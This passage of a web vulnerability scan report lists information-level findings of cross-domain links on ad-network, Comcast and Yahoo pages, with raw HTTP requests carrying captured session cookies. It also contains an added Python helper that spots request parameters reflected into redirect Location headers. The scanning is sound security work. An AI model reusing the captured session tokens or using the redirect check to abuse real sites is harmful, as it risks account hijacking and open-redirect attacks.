Content-Length: 8095

<html><head>
<meta http-equiv="Content-Type" content="text/html;charset=UTF-8" />
<meta http-equiv="Cache-Control" content="no-cache" />
<meta http-equiv="Expires" content="Sat, 16 Nov 2002 00:00:01 G
...[SNIP]...
<noscript><img width=1 height=1 alt="" src="http://csc.beap.ad.yieldmanager.net/i?bv=1.0.0&bs=(1283rj42a(gid$sKmKjWKIR.bpARpjTl.wjRc_Mhd7ak5mFhQABxqj,st$1315313172477916,v$1.0))&t=J_3-D_3"></noscript>
...[SNIP]...

15.53. http://beacon.dedicatednetworks.com/js/t.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://beacon.dedicatednetworks.com
Path:   /js/t.aspx

Issue detail

The page was loaded from a URL containing a query string: The response contains the following link to another domain:

Request

GET /js/t.aspx?aid=084BF99942C00D12 HTTP/1.1
Host: beacon.dedicatednetworks.com
Proxy-Connection: keep-alive
Referer: http://www.ooma.com/premier
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP=\'IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT\'
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 11:59:04 GMT
Content-Length: 211

var axel = Math.random()+"";
var a = axel * 10000000000000;
document.write('<IMG SRC="https://ad.doubleclick.net/activity;src=2736591;type=oomap527;cat=connm417;ord=1;num='+ a + '?" WIDTH=1 HEIGHT=1 BORDER=0>');

15.54. http://cm.g.doubleclick.net/pixel

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cm.g.doubleclick.net
Path:   /pixel

Issue detail

The page was loaded from a URL containing a query string: The response contains the following link to another domain:

Request

GET /pixel?nid=invitemedia&redirectURL=http%3A%2F%2Fad.yieldmanager.com%2Fpixel%3Fid%3D1291642%26t%3D2 HTTP/1.1
Host: cm.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.comcast.com/Movers/Move.cspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 302 Found
Location: http://g-pixel.invitemedia.com/gmatcher?id=E1&redirectURL=http%3A%2F%2Fad.yieldmanager.com%2Fpixel%3Fid%3D1291642%26t%3D2
Cache-Control: no-store, no-cache
Pragma: no-cache
Date: Tue, 06 Sep 2011 12:24:23 GMT
Content-Type: text/html; charset=UTF-8
Server: Cookie Matcher
Content-Length: 322
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://g-pixel.invitemedia.com/gmatcher?id=E1&amp;redirectURL=http%3A%2F%2Fad.yieldmanager.com%2Fpixel%3Fid%3D1291642%26t%3D2">here</A>
...[SNIP]...

15.55. http://cm.g.doubleclick.net/pixel

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cm.g.doubleclick.net
Path:   /pixel

Issue detail

The page was loaded from a URL containing a query string. The response contains the following link to another domain:

Request

GET /pixel?nid=invitemedia&redirectURL=http%3A%2F%2Fad.yieldmanager.com%2Fpixel%3Fid%3D1291646%26t%3D2 HTTP/1.1
Host: cm.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.comcast.com/Corporate/Learn/DigitalCable/digitalcable.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 302 Found
Location: http://g-pixel.invitemedia.com/gmatcher?id=E1&redirectURL=http%3A%2F%2Fad.yieldmanager.com%2Fpixel%3Fid%3D1291646%26t%3D2
Cache-Control: no-store, no-cache
Pragma: no-cache
Date: Tue, 06 Sep 2011 12:25:31 GMT
Content-Type: text/html; charset=UTF-8
Server: Cookie Matcher
Content-Length: 322
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://g-pixel.invitemedia.com/gmatcher?id=E1&amp;redirectURL=http%3A%2F%2Fad.yieldmanager.com%2Fpixel%3Fid%3D1291646%26t%3D2">here</A>
...[SNIP]...

15.56. http://cm.g.doubleclick.net/pixel

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cm.g.doubleclick.net
Path:   /pixel

Issue detail

The page was loaded from a URL containing a query string. The response contains the following link to another domain:

Request

GET /pixel?nid=invitemedia HTTP/1.1
Host: cm.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?XKUDAOiUGABiUZgAAAAAAAnhJQAAAAAAAgAAAAYAAAAAAP8AAAADCOQEHgAAAAAAXLsgAAAAAABfoTEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADdJAIAAAAAAAIAAwAAAAAAFK5H4XoUBkAUrkfhehQGQBSuR-F6FAZAFK5H4XoUBkAUrkfhehQGQBSuR-F6FAZAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC-1vKFRPquCrnRbevBKa2aOyXC53U8C3Yzkg4BAAAAAA==,http%3A%2F%2Fglobal.ard.yahoo.com%2FSIG%3D15jnbi3cd%2FM%3D787833.14445127.14291894.22%2FD%3Dsports%2FS%3D2022092242%3AN%2F_ylt%3DAq9E8pK_YqzvgGRT6l1fMpDSrYZ4%2FY%3DYAHOO%2FEXP%3D1315320284%2FL%3DF8DhwmKIPE7pARpjTl.wjQIRMhd7ak5mFbwADIEZ%2FB%3DFBSePtj8fcY-%2FJ%3D1315313084968840%2FK%3DtHb_lv57MAgihszSpmJhkw%2FA%3D6261245%2FR%3D0%2F%2A%24,http%3A%2F%2Fsports.yahoo.com%2Fnfl%2Fblog%2Fshutdown_corner%2Fpost%2Ftiki-barber-remains-unemployed-and-sad%3Furn%3Dnfl-wp6443,B%3D10%26D%3Dzip%253D%2526ycg%253D%2526yyob%253D%26S%3D14445127%26Z%3D728x90%26_PVID%3DF8DhwmKIPE7pARpjTl.wjQIRMhd7ak5mFbwADIEZ%26_salt%3D2271271428%26cb%3D1315313084968840%26i%3D140509%26r%3D0,04162e62-d886-11e0-b0bb-78e7d1fa057c
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 302 Found
Location: http://g-pixel.invitemedia.com/gmatcher?id=E1
Cache-Control: no-store, no-cache
Pragma: no-cache
Date: Tue, 06 Sep 2011 12:44:57 GMT
Content-Type: text/html; charset=UTF-8
Server: Cookie Matcher
Content-Length: 242
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://g-pixel.invitemedia.com/gmatcher?id=E1">here</A>
...[SNIP]...
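
Findings 15.54 to 15.56 all show the same pattern for cm.g.doubleclick.net/pixel: the value of a request parameter reappears inside the 302 Location the server issues. The report records this only as an information-level cross-domain link, and nothing below claims more than that; a redirector may well restrict which hosts it forwards to. The following helper, an added example that is not code from the report, from Burp Suite or from any of the scanned sites, makes such parameter-to-Location pass-through explicit so a tester knows where to look by hand. The sample request and response are constructed from finding 15.54 with the headers that do not matter to the check left out; the 4-character minimum on matched values is an arbitrary noise filter.

```python
# Added example (not from the report or the sites it scanned): make explicit
# what findings 15.54-15.56 show for cm.g.doubleclick.net/pixel, namely that
# a request parameter's value reappears in the 302 Location. That alone is
# an observation for follow-up, not a vulnerability: the report rates these
# as Information, and a redirector may restrict which hosts it forwards to.
from urllib.parse import parse_qs, unquote, urlsplit


def parse_raw_http(message):
    """Split a raw request or response into (start line, {header: value}, body)."""
    head, _, body = message.replace("\r\n", "\n").partition("\n\n")
    lines = head.strip("\n").split("\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def reflected_into_location(raw_request, raw_response):
    """Return {param: decoded value} for each query parameter of the request
    whose value (at least 4 chars, to skip accidental matches) appears in the
    response's Location header, in raw or percent-decoded form. Empty dict
    unless the response is a 3xx redirect."""
    request_line, _, _ = parse_raw_http(raw_request)
    status_line, headers, _ = parse_raw_http(raw_response)
    if not status_line.split()[1].startswith("3"):
        return {}
    location = headers.get("location", "")
    decoded_location = unquote(location)
    query = urlsplit(request_line.split()[1]).query
    hits = {}
    for name, values in parse_qs(query, keep_blank_values=True).items():
        for value in values:
            if len(value) >= 4 and (value in location or value in decoded_location):
                hits[name] = value
    return hits


# Constructed from finding 15.54; headers irrelevant to the check are omitted.
SAMPLE_REQUEST = (
    "GET /pixel?nid=invitemedia&redirectURL=http%3A%2F%2Fad.yieldmanager.com"
    "%2Fpixel%3Fid%3D1291642%26t%3D2 HTTP/1.1\r\n"
    "Host: cm.g.doubleclick.net\r\n"
    "Cookie: id=OPT_OUT\r\n\r\n"
)
SAMPLE_RESPONSE = (
    "HTTP/1.1 302 Found\r\n"
    "Location: http://g-pixel.invitemedia.com/gmatcher?id=E1&redirectURL="
    "http%3A%2F%2Fad.yieldmanager.com%2Fpixel%3Fid%3D1291642%26t%3D2\r\n"
    "Server: Cookie Matcher\r\n\r\n"
    "<HTML><HEAD><TITLE>302 Moved</TITLE></HEAD><BODY>...</BODY></HTML>"
)

if __name__ == "__main__":
    for name, value in reflected_into_location(SAMPLE_REQUEST, SAMPLE_RESPONSE).items():
        print(f"{name} -> Location: {value}")
```

Both parameters match on the sample: redirectURL because its decoded value is carried through verbatim, and nid because the matcher's hostname happens to be named after the network id, which is a lookup rather than a reflection. The substring test is deliberately loose for that reason; deciding whether a pass-through is actually abusable is manual work the report does not attempt.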

15.57. http://customer.comcast.com/Pages/FAQDisplay.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://customer.comcast.com
Path:   /Pages/FAQDisplay.aspx

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /Pages/FAQDisplay.aspx?Guid=eb1cdc34-2fa3-4cf6-8b00-32f1e4e30feb HTTP/1.1
Host: customer.comcast.com
Proxy-Connection: keep-alive
Referer: http://customer.comcast.com/Pages/FAQViewer.aspx?Guid=2ac169ad-5420-475d-b1ef-5d5cf2224639
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UCID=86e6f9cd-e501-4b6d-9a3f-1acdcee0e2c9; ServerID=1035; SC=RC.USID=affb48c8-12df-45e7-aa6c-841fefd17445&SegmentationMode=TargusA; VISITORID=2086762009; ASP.NET_SessionId=wz5mknqosvb1zefgqhr2jlu3; __utma=24577576.1274302.1315329902.1315329902.1315329902.1; __utmb=24577576.2.10.1315329902; __utmc=24577576; __utmz=24577576.1315329902.1.1.utmcsr=search|utmccn=(organic)|utmcmd=organic|utmctr=internet%20phone; bn_u=6923713561343025788; mbox=session#1315327839174-766376#1315331799|PC#1315327839174-766376.19#1316539539|check#true#1315329999; s_pers=%20s_cpm%3D%255B%255B'Keyword'%252C'1315327839972'%255D%252C%255B'Direct%252520Load'%252C'1315329734689'%255D%255D%7C1473182534689%3B%20s_v5%3D%255B%255B'xss'%252C'1315329734677'%255D%252C%255B'internet%252520phone'%252C'1315329907243'%255D%252C%255B'isp%252520email'%252C'1315329913981'%255D%255D%7C1473182713981%3B%20s_dfa%3Dcomcastdotcomprod%7C1315331738091%3B%20gpv_07%3Dcorporate%2520-%2520customers%2520-%2520customerguarantee%2520%7C1315331738106%3B; fsr.s={"v":1,"pv":12,"lc":{"d0":{"v":12,"s":true,"e":2}},"sd":0,"cp":{"CustomerID":"86e6f9cd-e501-4b6d-9a3f-1acdcee0e2c9"}}; s_cc=true; s_sq=%5B%5BB%5D%5D; s_sess=%20_dr%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253Dutf-8%2526q%253Dtelephone%252Bservice%3B%20cf%3D0%3B%20c%3DundefinedDirect%2520LoadDirect%2520Load%3B%20ev41%3Disp%2520email%3B%20stc18%3Disp%2520email%3B%20s_cc%3Dtrue%3B%20s_sq%3Dcomcastsupportforumsdev%253D%252526pid%25253DComcast%25252520Help%25252520and%25252520Support%25252520Forums%25252FXfinity%25252520Central%25252FCustomer%25252520Service%25252FGamePass%25252520cancellation%25252520and%25252520e-mail%25252520response%25252520times%25252F%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%25252F%25252Fwww.comcast.com%25252FCorporate%25252FCustomers%25252FCustomerGuarantee.html%252526ot%25253DA%3B%20SC_LINKS%3D%3B

Response

HTTP/1.0 200 OK
Connection: close
Date: Tue, 06 Sep 2011 12:25:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 34622


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="ctl00_Overl
...[SNIP]...
<p><a target="_blank" href="http://10.0.0.1">http://10.0.0.1</a>
...[SNIP]...
<li>Router Login:&nbsp;<a target="_blank" href="http://10.0.0.1">http://10.0.0.1</a>
...[SNIP]...
<td valign="top" align="left"><a target="_blank" href="http://www.routerlogin.net">http://www.routerlogin.net</a>
...[SNIP]...
<br />
<a target="_blank" href="http://192.168.1.1">http://192.168.1.1<br />
...[SNIP]...
<td valign="top" align="left"><a target="_blank" href="http://www.routerlogin.net">http://www.routerlogin.net</a>
...[SNIP]...
<br />
<a target="_blank" href="http://192.168.1.1">http://192.168.1.1</a>
...[SNIP]...
<td valign="top" align="left"><a target="_blank" href="http://192.168.1.1">http://192.168.1.1</a>
...[SNIP]...
<br />
<a target="_blank" href="http://ui.linksys.com/files/WRT310N/1.00.4/">http://ui.linksys.com/files/WRT310N/1.00.4/</a>
...[SNIP]...
<td valign="top" align="left"><a target="_blank" href="http://www.routerlogin.net ">http://www.routerlogin.net </a>
...[SNIP]...
<br />
<a target="_blank" href="http://192.168.1.1">http://192.168.1.1</a>
...[SNIP]...
</strong> icon on your desktop, open your Web browser and go to <a target="_blank" href="http://192.168.0.1 ">http://192.168.0.1 </a>
...[SNIP]...

15.58. http://customer.comcast.com/Pages/FAQViewer.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://customer.comcast.com
Path:   /Pages/FAQViewer.aspx

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /Pages/FAQViewer.aspx?Guid=2ac169ad-5420-475d-b1ef-5d5cf2224639 HTTP/1.1
Host: customer.comcast.com
Proxy-Connection: keep-alive
Referer: http://sitesearch.comcast.com/?q=internet+phone&cat=com#
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UCID=86e6f9cd-e501-4b6d-9a3f-1acdcee0e2c9; ServerID=1035; SC=RC.USID=affb48c8-12df-45e7-aa6c-841fefd17445&SegmentationMode=TargusA; VISITORID=2086762009; s_sq=%5B%5BB%5D%5D; fsr.s={"v":1,"pv":8,"lc":{"d0":{"v":8,"s":true,"e":1}},"sd":0,"cp":{"CustomerID":"86e6f9cd-e501-4b6d-9a3f-1acdcee0e2c9"}}; ASP.NET_SessionId=wz5mknqosvb1zefgqhr2jlu3; mbox=session#1315327839174-766376#1315331762|PC#1315327839174-766376.19#1316539502|check#true#1315329962; s_pers=%20s_cpm%3D%255B%255B'Keyword'%252C'1315327839972'%255D%252C%255B'Direct%252520Load'%252C'1315329734689'%255D%255D%7C1473182534689%3B%20s_v5%3D%255B%255B'xss'%252C'1315329734677'%255D%252C%255B'internet%252520phone'%252C'1315329871911'%255D%255D%7C1473182671911%3B%20s_dfa%3Dcomcastdotcomprod%7C1315331702273%3B%20gpv_07%3Dcustomercentral%253Ahelp%253Ahow%2520do%2520i%2520know%2520which%2520xfinity%2520internet%25202go%2520service%2520is%2520best%2520for%2520me%253F%253A%2520faq%2520viewer%7C1315331702288%3B; s_sess=%20_dr%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253Dutf-8%2526q%253Dtelephone%252Bservice%3B%20cf%3D0%3B%20c%3DundefinedDirect%2520LoadDirect%2520Load%3B%20ev41%3Dinternet%2520phone%3B%20stc18%3Dinternet%2520phone%3B%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; __utma=24577576.1274302.1315329902.1315329902.1315329902.1; __utmb=24577576.1.10.1315329902; __utmc=24577576; __utmz=24577576.1315329902.1.1.utmcsr=search|utmccn=(organic)|utmcmd=organic|utmctr=internet%20phone; bn_u=6923713561343025788; fsr.a=1315329904559

Response

HTTP/1.0 200 OK
Connection: close
Date: Tue, 06 Sep 2011 12:25:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 35850


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="ctl00_Head1"><t
...[SNIP]...
</script>
<script src="https://secure.xfinity.com/js-api/compressed/xpbar.js?version=2" type="text/javascript"></script>
...[SNIP]...
<dt><a onclick="window.open('http://www.askcomcast.com/acv5.asp','_blank','height=465,width=495');return false;" href="http://www.askcomcast.com/acv5.asp">Ask Comcast</a>
...[SNIP]...
<dt><a target="_blank" href="http://www.comcastsupport.com/email">E-mail Us</a>
...[SNIP]...
<dt><a onclick="window.open('http://www.comcastsupport.com/redirects/chat/chathelpfp.asp','_blank','height=700,width=800,scrollbars=yes');return false;" href="http://www.comcastsupport.com/redirects/chat/chathelpfp.asp">Chat With Us</a>
...[SNIP]...
<p>If you are a current Comcast customer and you want to know the price of an extra cable box, <a target="_blank" href="http://www.comcastsupport.com/chat">chat with a Comcast representative</a>
...[SNIP]...

15.59. http://finance.yahoo.com/lookup

Summary

Severity:   Information
Confidence:   Certain
Host:   http://finance.yahoo.com
Path:   /lookup

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /lookup?s=xss HTTP/1.1
Host: finance.yahoo.com
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii; adxid=016e3b4e6615bdb5; finbeta=fp-bkt_o; adxf=3078081@1@223.1071929@2@223; BA=ba=4&ip=50.23.123.106&t=1315331160

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:48:06 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Cache-Control: private
Vary: Accept-Encoding
Content-Type: text/html;charset=utf-8
Age: 0
Proxy-Connection: keep-alive
Server: YTS/1.20.7
Content-Length: 64558

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US">
<head>
<title>Symbol Lookup from Yahoo! Finance</title>
<meta http-equiv="Content
...[SNIP]...
<meta name="keywords" content="symbol lookup, ticker lookup, stock symbol lookup">

<link rel="stylesheet" type="text/css" href="http://l.yimg.com/bm/combo?fi/common/p/d/static/js/2.0.188908/yui_2.8.0/build/reset-fonts-grids/2.0.0/mini/reset-fonts-grids.css&fi/common/p/d/static/js/2.0.188908/yui_2.8.0/build/tabview/assets/skins/sam/2.0.0/mini/tabview.css&fi/common/p/d/static/css/2.0.188908/2.0.0/mini/yfi_base.css&fi/common/p/d/static/css/2.0.188908/2.0.0/mini/lookup.css&fi/common/p/d/static/css/2.0.188908/2.0.0/mini/yfi_siab_lookup.css&fi/common/p/d/static/css/2.0.188908/2.0.0/mini/yfi_nav_topnav_base.css&fi/common/p/d/static/css/2.0.188908/2.0.0/mini/yfi_nav_topnav_theme.css&fi/common/p/d/static/css/2.0.188908/2.0.0/mini/yfi_nav_quotebar.css&fi/common/p/d/static/css/2.0.188908/2.0.0/mini/yfi_nav_footer_base.css&fi/common/p/d/static/css/2.0.188908/2.0.0/mini/yfi_nav_footer_theme.css&fi/common/p/d/static/css/2.0.188908/2.0.0/mini/yui_helper.css&fi/common/p/d/static/css/2.0.188908/2.0.0/mini/yfi_symbol_suggest.css" />
</head>
...[SNIP]...
<div id="yfi_fp_hd">
<link type='text/css' rel='stylesheet' href='http://l.yimg.com/zz/combo?kx/ucs/uh/css/215/yunivhead-min.css&kx/ucs/uh/css/221/logo-min.css&kx/ucs/search/css/180/search_all-min.css&kx/ucs/search/css/170/search_buttons-min.css'/><style>
...[SNIP]...
903/B=nYQ4Q0PDhEw-/J=1315313286327912/K=URqeTfr3zDD1947mBh5eOA/A=6433971/R=2/SIG=13dr0chmn/*http://ad.doubleclick.net/jump/N6036.Yahoo.com/B5653524.6;abr=!ie4;abr=!ie5;sz=728x90;ord=1315313286327912?"><IMG SRC="http://ad.doubleclick.net/ad/N6036.Yahoo.com/B5653524.6;abr=!ie4;abr=!ie5;sz=728x90;ord=1315313286327912?" BORDER=0 WIDTH=728 HEIGHT=90 ALT="Advertisement"></A>
...[SNIP]...
<!--QYZ 705779051,;;FB2;2142000625;7;--><iframe style="padding:0px;margin:0px;" src="http://ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260/68.0.iframe.120x60/1315313286327912?yud=smpv%3d3%26ed%3dKfb2BHkzcaa_Ez5Am4dvC37N1raRCR5h1JWlV.d5tpky0b8xMSZkytDAsrQiWlFiRI7KrmsgZd3dnvnG&encver=1&encalgo=3DES-CFB-SHA1&app=apt&intf=1&click=http://global.ard.yahoo.com/SIG=15u7mhqkb/M=601843023.602979803.858295551.826566051/D=fin/S=2142000625:FB2/Y=YAHOO/EXP=1315320486/L=PeL0lEPDkjnpARpjTl.wjQIrMhd7ak5mFoYAA903/B=mIQ4Q0PDhEw-/J=1315313286327912/K=URqeTfr3zDD1947mBh5eOA/A=3686351322249551559/R=0/X=3/*" title="" border="0" frameBorder="0" scrolling="no" width="120" height="60"></iframe>
...[SNIP]...
<!-- APT Vendor: Doubleclick --><IFRAME SRC="http://ad.doubleclick.net/adi/N6067.160910.7443114402621/B5129127.36;sz=120x60;dcopt=rcl;mtfIFPath=nofile;click=http://global.ard.yahoo.com/SIG=15u84g3hn/M=601454399.602194378.673385551.687570551/D=fin/S=2142000625:FB2/Y=YAHOO/EXP=1315320486/L=PeL0lEPDkjnpARpjTl.wjQIrMhd7ak5mFoYAA903/B=l4Q4Q0PDhEw-/J=1315313286327912/K=URqeTfr3zDD1947mBh5eOA/A=2892168919546073312/R=1/X=3/*;ord=1315313286327912?" WIDTH=120 HEIGHT=60 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR='#000000'><SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N6067.160910.7443114402621/B5129127.36;abr=!ie;sz=120x60;dcopt=rcl;mtfIFPath=nofile;click=http://global.ard.yahoo.com/SIG=15u84g3hn/M=601454399.602194378.673385551.687570551/D=fin/S=2142000625:FB2/Y=YAHOO/EXP=1315320486/L=PeL0lEPDkjnpARpjTl.wjQIrMhd7ak5mFoYAA903/B=l4Q4Q0PDhEw-/J=1315313286327912/K=URqeTfr3zDD1947mBh5eOA/A=2892168919546073312/R=2/X=3/*;ord=1315313286327912?"></SCRIPT>
...[SNIP]...
286327912/K=URqeTfr3zDD1947mBh5eOA/A=2892168919546073312/R=0/X=3/SIG=13pqnd2jh/*http://ad.doubleclick.net/jump/N6067.160910.7443114402621/B5129127.36;abr=!ie4;abr=!ie5;sz=120x60;ord=1315313286327912?"><IMG SRC="http://ad.doubleclick.net/ad/N6067.160910.7443114402621/B5129127.36;abr=!ie4;abr=!ie5;sz=120x60;ord=1315313286327912?" BORDER=0 WIDTH=120 HEIGHT=60 ALT="Advertisement"></A>
...[SNIP]...
</script><SCRIPT type="text/javascript" src="http://resource.tcgmsrv.net/tase/js/uac.js"></script><noscript> <iframe src="http://adserver.teracent.net/tase/ad?AdBoxType=49&Partner=305&url=fidelity.yahoo.buttons&inv=yaptenc&taid=1298047689104&CustomQuery=lineid%3D207575051%26position%3D1215986051%26site%3Dfinance.yahoo.com&yud=smpv%3d3%26ed%3d5sKNhYzvryTNPuv3gspQXPvZcE4mLfW3Jn_37SuIx8txQGB3ozBXXtL8U2c-&rnd=1315313286327912&esc=0&rcu=http://global.ard.yahoo.com/SIG=15unbqkpj/M=601846039.602985816.859733051.826566051/D=fin/S=2142000625:FB2/Y=YAHOO/EXP=1315320486/L=PeL0lEPDkjnpARpjTl.wjQIrMhd7ak5mFoYAA903/B=mYQ4Q0PDhEw-/J=1315313286327912/K=URqeTfr3zDD1947mBh5eOA/A=3692525337737555437/R=1/X=3/*" align="center" allowtransparency="true" frameborder="0" hspace="0" marginheight="0" marginwidth="0" scrolling="no" style="border:none;display:block;height:[REPLACE WITH HEIGHT]px;margin:0;padding:0;width:[REPLACE WITH WIDTH]px;" vspace="0"></iframe>
...[SNIP]...
<div id="yfi_fp_right">
<IFRAME FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=NO WIDTH=160 HEIGHT=600 SRC="http://ad.yieldmanager.com/st?_PVID=PeL0lEPDkjnpARpjTl.wjQIrMhd7ak5mFoYAA903&ad_type=iframe&ad_size=160x600&site=140440&section_code=14445074&cb=1315313286327912&promote_sizes=1&yud=zip%3D%26ycg%3D%26yyob%3D&pub_redirect_unencoded=1&pub_redirect=http://global.ard.yahoo.com/SIG=15nufd2uu/M=787833.14445074.14291837.1414235/D=fin/S=2142000625:SKY/Y=YAHOO/EXP=1315320486/L=PeL0lEPDkjnpARpjTl.wjQIrMhd7ak5mFoYAA903/B=oIQ4Q0PDhEw-/J=1315313286327912/K=URqeTfr3zDD1947mBh5eOA/A=6261160/R=0/*"></IFRAME>
...[SNIP]...
</script>


<script type="text/javascript" src="http://l.yimg.com/bm/combo?fi/common/p/d/static/js/2.0.188908/yui_2.8.0/build/yahoo-dom-event/2.0.0/mini/yahoo-dom-event.js&fi/common/p/d/static/js/2.0.188908/yui_2.8.0/build/element/2.0.0/mini/element-min.js&fi/common/p/d/static/js/2.0.188908/yui_2.8.0/build/get/2.0.0/mini/get.js&fi/common/p/d/static/js/2.0.188908/yui_2.8.0/build/tabview/2.0.0/mini/tabview-min.js&fi/common/p/d/static/js/2.0.188908/yui_2.8.0/build/yuiloader-dom-event/2.0.0/mini/yuiloader-dom-event.js&fi/common/p/d/static/js/2.0.188908/yui_2.8.0/build/cookie/2.0.0/mini/cookie.js&fi/common/p/d/static/js/2.0.188908/yui_2.8.0/build/connection/2.0.0/mini/connection.js&fi/common/p/d/static/js/2.0.188908/yui_2.8.0/build/container/2.0.0/mini/container.js&fi/common/p/d/static/js/2.0.188908/2.0.0/mini/yui-min-3.2.0.js&fi/common/p/d/static/js/2.0.188908/2.0.0/mini/yfi_nav_topnav.js&fi/common/p/d/static/js/2.0.188908/2.0.0/mini/yfi_nav_topnav_i